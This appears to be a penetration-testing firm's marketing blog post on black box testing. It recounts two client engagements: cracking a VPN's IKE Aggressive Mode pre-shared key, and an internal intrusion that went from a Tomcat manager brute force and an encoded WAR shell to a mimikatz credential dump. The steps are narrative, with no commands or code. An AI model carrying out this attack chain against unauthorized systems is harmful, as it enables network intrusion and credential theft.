The advantages of a Black Box Penetration Test are many. Black Box Penetration Testing finds issues that simple vulnerability scanning will not discover. A Black Box Penetration Test is an unauthenticated test - a penetration test where little information is known about the target, other than maybe an IP address, URL, or building location. In essence, the target's environment is a "black box". As ethical hackers, we have to determine what's inside the black box and how to exploit vulnerabilities discovered within the black box.
Rather than speak of theory about the advantages of a Black Box Penetration Test, we'll discuss some specific scenarios where we discovered major (critical) issues because we used Black Box Penetration Testing. These critical findings were missed by vulnerability scanners.
Scenario 1: External Black Box Penetration Test - Internet Key Exchange (IKE) Aggressive Mode Issue
In this engagement, the client had a VPN Server with IKE Aggressive Mode enabled. In IKE Aggressive mode, the authentication hash is based on a Pre-Shared Key (PSK). The hash is transmitted in response to the initial packet of a VPN client trying to establish an IPSec Tunnel. This hash is not encrypted. This allows an attacker to grab the hash for offline cracking.
In this scenario, we used Nessus, a vulnerability scanner. Nessus identified the vulnerability with IKE Aggressive Mode as Medium Risk. As part of our penetration test, we captured the VPN PSK hash. We were able to crack the password in 19 minutes. This allowed us to connect to the client's VPN, which had access to critical systems with Protected Health Information (PHI) on them. We reported this to the client immediately as a Critical finding, despite the "Medium" finding Nessus provided. The client resolved the issue by using a much stronger passphrase and also configuring the VPN with two stages of authentication. After the VPN passphrase, the VPN client is now prompted for Active Directory credentials.
The end result of this scenario is less risk for this client and better protection of PHI. A "medium" finding, according to Nessus, may not have been treated seriously or ever "gotten around to". Our Black Box Penetration Test yielded a Critical finding, which was resolved immediately.
Scenario 2: Internal Black Box Penetration Test - Owning the Domain
This engagement involved an on-site Black Box Penetration Test. During this engagement, we visited the client's facility, saw a free cubicle, unplugged the network cable from the computer at the cubicle, and plugged it into our laptop. We then performed reconnaissance on the network. Our nmap results showed several web servers running on multiple ports. Manually browsing to the web servers, we discovered one of them was running the Tomcat manager interface. We used a Metasploit tool to crack the Tomcat manager interface username and password. This allowed us to deploy a war file to the server. The war file contained a payload that we encoded to avoid antimalware. We were able to browse to our deployed "package" on the web server, which gave us a shell. From there, we ran mimikatz to dump credentials from RAM. One of the credentials we dumped from RAM was an Active Directory domain "service" account. This account was a Domain Admin account. At this point, we called off the engagement and worked with the client to mitigate these issues.
It is worth noting that in this scenario, the client routinely performed vulnerability scanning and the vector we used to gain complete access was never identified as a vulnerability with the vulnerability scanning software.
The outcome of this scenario resulted in the client implementing several security controls, including 802.1x, changing service account permissions, removing unnecessary services, and creating stronger passwords.
Unfortunately, many organizations have a false sense of security because they run a vulnerability scanning tool on a routine basis. We certainly believe this is a great step in the right direction, however, a vulnerability scanning tool does not catch everything. If you're concerned about the true cybersecurity risk to your organization, consider a Black Box Penetration Test.
Contact us with questions or to purchase a Black Box Penetration Test.